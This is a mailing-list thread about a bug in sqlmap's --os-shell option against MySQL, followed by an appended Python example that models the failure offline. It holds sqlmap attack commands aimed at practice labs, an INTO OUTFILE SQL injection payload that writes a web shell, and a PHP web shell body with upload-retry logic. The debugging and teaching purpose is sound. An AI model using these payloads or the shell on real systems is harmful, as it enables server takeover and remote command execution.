Re: [sqlmap-users] SQLmap --os-shell BUG
From: Danux <da...@gm...> - 2015-07-05 00:47:46
That was fast! Thanks Miroslav. Great tool!

On Sat, Jul 4, 2015 at 4:47 PM, Miroslav Stampar <mir...@gm...> wrote:
> Thank you for your report. Fixed with the latest revision
> (https://github.com/sqlmapproject/sqlmap/issues/1290)
>
> Bye
>
> On Sun, Jul 5, 2015 at 1:16 AM, Danux <da...@gm...> wrote:
>> With yours it is not throwing the error; you can reproduce my case with the
>> owasppractice examples. I am attaching the source code here; you will need
>> to set up the DB. Once it is up and running, try lesson03:
>>
>> sqlmap.py -u http://OwaspPractice/injection/lessons/lesson03/index.php?code=N --os-shell --prefix "\")" -v3
>>
>> it looks like the back-end DBMS is 'MySQL'. Do you want to skip test
>> payloads specific for other DBMSes? [Y/n]
>> Y
>> for the remaining tests, do you want to include all tests for 'MySQL'
>> extending provided level (1) and risk (1) values? [Y/n]
>> n
>>
>> And you should get the same error-handling issue.
>>
>> On Sat, Jul 4, 2015 at 4:01 PM, Miroslav Stampar <mir...@gm...> wrote:
>>> Something really wrong is happening here. One user is having the
>>> identical problem as you (AttributeError: 'NoneType' object has no
>>> attribute 'replace') and I am not able to reproduce it.
>>>
>>> Can you please rerun your sqlmap version with
>>> "http://testphp.vulnweb.com/artists.php?artist=1" and tell me if you get
>>> the same error?
>>>
>>> Bye
>>>
>>> On Sun, Jul 5, 2015 at 12:57 AM, Danux <da...@gm...> wrote:
>>>> Just cloned git and got the 1.0-dev-166dc98 version, but got an unhandled
>>>> exception error:
>>>>
>>>> ./sqlmap.py -u http://OwaspPractice/injection/lessons/lesson03/index.php?code=N --os-shell --prefix "\")" --flush-session -v3
>>>>
>>>> /sqlmap'. If the exception persists, please open a new issue at
>>>> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>>> text and any other information required to reproduce the bug. The
>>>> developers will try to reproduce the bug, fix it accordingly and get back
>>>> to you
>>>> sqlmap version: 1.0-dev-166dc98
>>>> Python version: 2.7.3
>>>> Operating system: posix
>>>> Command line: sqlmap.py -u ********************************************************************* --os-shell --prefix ") --flush-session -v3
>>>> Technique: None
>>>> Back-end DBMS: MySQL (fingerprinted)
>>>> Traceback (most recent call last):
>>>>   File "sqlmap.py", line 102, in main
>>>>     start()
>>>>   File "lib/controller/controller.py", line 514, in start
>>>>     injection = checkSqlInjection(place, parameter, value)
>>>>   File "lib/controller/checks.py", line 391, in checkSqlInjection
>>>>     reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
>>>>   File "lib/core/agent.py", line 188, in payload
>>>>     retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
>>>> AttributeError: 'NoneType' object has no attribute 'replace'
>>>>
>>>> On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>>> I believe that you are using an old revision. For a long time there has
>>>>> been at least a git revision or a pseudo "non-git" number appearing when
>>>>> "sqlmap --version" is used.
>>>>>
>>>>> Please update to the latest revision from the official github
>>>>> repository and rerun sqlmap.
>>>>>
>>>>> Bye
>>>>>
>>>>> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:
>>>>>> Thanks
>>>>>>
>>>>>> sqlmap --version
>>>>>> sqlmap/1.0-dev
>>>>>>
>>>>>> In the meantime I will patch procs/mysql/write_file_limit.sql
>>>>>>
>>>>>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>> Which revision/version of sqlmap do you use? There was a
>>>>>>> related patch a month ago. Will check tomorrow.
>>>>>>>
>>>>>>> Bye
>>>>>>>
>>>>>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>>>>>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>>>>>>> option in version sqlmap/1.0-dev with MySQL 5.5.35-0+wheezy1 (Debian).
>>>>>>>>
>>>>>>>> Description:
>>>>>>>>
>>>>>>>> A specific PAYLOAD (see below) used to upload a web shell will
>>>>>>>> create an empty file, e.g. tmpbezff.php; this causes every
>>>>>>>> subsequent PAYLOAD attempt to fail with an "already exists" error, and
>>>>>>>> therefore it is not able to upload the web shell.
>>>>>>>>
>>>>>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%[...]--+
>>>>>>>>
>>>>>>>> By default, MySQL will throw an error if the file already exists:
>>>>>>>>
>>>>>>>> mysql> select 'ss' into outfile '/var/www/OwaspPractice/upload/tmpbezff.php';
>>>>>>>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>>>>>>>>
>>>>>>>> Solution:
>>>>>>>>
>>>>>>>> 1. Change the web shell name for every new PAYLOAD attempt, at
>>>>>>>>    least when using the --os-shell option
>>>>>>>> 2. Fix the PAYLOAD causing problems.
>>>>>>>>
>>>>>>>> --
>>>>>>>> DanUx
>>>>>>>
>>>>>>> --
>>>>>>> Miroslav Stampar
>>>>>>> http://about.me/stamparm
>>>>>>
>>>>>> --
>>>>>> DanUx
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>>
>>>> --
>>>> DanUx
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>
>> --
>> DanUx
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
DanUx
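The failure mode in the original report (a first INTO OUTFILE payload that matches no rows still creates an empty file, and MySQL then refuses every later write to that name with ERROR 1086) and the proposed fix (a fresh web shell name per attempt) can be modelled offline. The following is an added example written for this page; it is not sqlmap's own code and does not touch MySQL. It assumes Python 3 and uses exclusive-create `open(path, "x")` as a stand-in for the server's create-or-fail semantics; the shell body, the `tmpXXXXX.php` naming and the list of per-attempt row sets are constructed for the demonstration.

```python
"""Model of why a fixed temp-file name breaks repeated INTO OUTFILE uploads.

MySQL's SELECT ... INTO OUTFILE refuses to overwrite an existing file
(ERROR 1086) and still creates the file when the SELECT matches no rows,
so a first attempt that returns nothing leaves an empty file behind.
Python's exclusive-create mode open(path, "x") has the same
create-or-fail semantics and is used here as a stand-in for the server.
Example code for this page; not sqlmap's implementation.
"""
import os
import secrets
import string
import tempfile

# Constructed sample shell body; any non-empty bytes would do.
SHELL_SOURCE = b"<?php system($_GET['cmd']); ?>"


def into_outfile(path, rows):
    """Stand-in for SELECT ... INTO OUTFILE: create-or-fail, then dump rows.

    Raises FileExistsError (the analogue of MySQL ERROR 1086) if the target
    already exists. An empty row set still creates an empty file, which is
    exactly what MySQL does.
    """
    with open(path, "xb") as fh:
        for row in rows:
            fh.write(row + b"\n")


def random_shell_name():
    """Fresh tmpXXXXX.php name, modelled on the names seen in the report."""
    suffix = "".join(secrets.choice(string.ascii_lowercase) for _ in range(5))
    return "tmp" + suffix + ".php"


def upload_shell(upload_dir, payload_results, rotate_name):
    """Try each payload in order; return (path, size) of a non-empty file, else None.

    payload_results lists the row set each successive payload would make the
    server write (constructed: the first payload matches no rows).
    With rotate_name=False the same file name is reused for every attempt,
    which is the behaviour the report describes.
    """
    name = random_shell_name()
    for rows in payload_results:
        if rotate_name:
            name = random_shell_name()
        path = os.path.join(upload_dir, name)
        try:
            into_outfile(path, rows)
        except FileExistsError:
            # ERROR 1086 analogue: the earlier empty file blocks this attempt.
            continue
        size = os.path.getsize(path)
        if size > 0:
            return path, size
    return None


def demo(rotate_name):
    """Run the report's scenario in a scratch directory.

    Returns (uploaded, files_left): whether a non-empty shell landed, and how
    many files the attempts left in the upload directory.
    """
    # Attempt 1 writes nothing (empty file); attempt 2 carries the shell.
    results = [[], [SHELL_SOURCE]]
    with tempfile.TemporaryDirectory() as d:
        outcome = upload_shell(d, results, rotate_name)
        files_left = len(os.listdir(d))
        return outcome is not None, files_left


if __name__ == "__main__":
    print("fixed name:    uploaded=%s files_left=%d" % demo(False))
    print("rotating name: uploaded=%s files_left=%d" % demo(True))
```

With a fixed name the first attempt leaves one empty file and the second attempt is rejected, so nothing usable is uploaded; with a fresh name per attempt the second attempt succeeds, at the cost of an extra empty file left behind in the upload directory, which is worth noting for clean-up after an engagement.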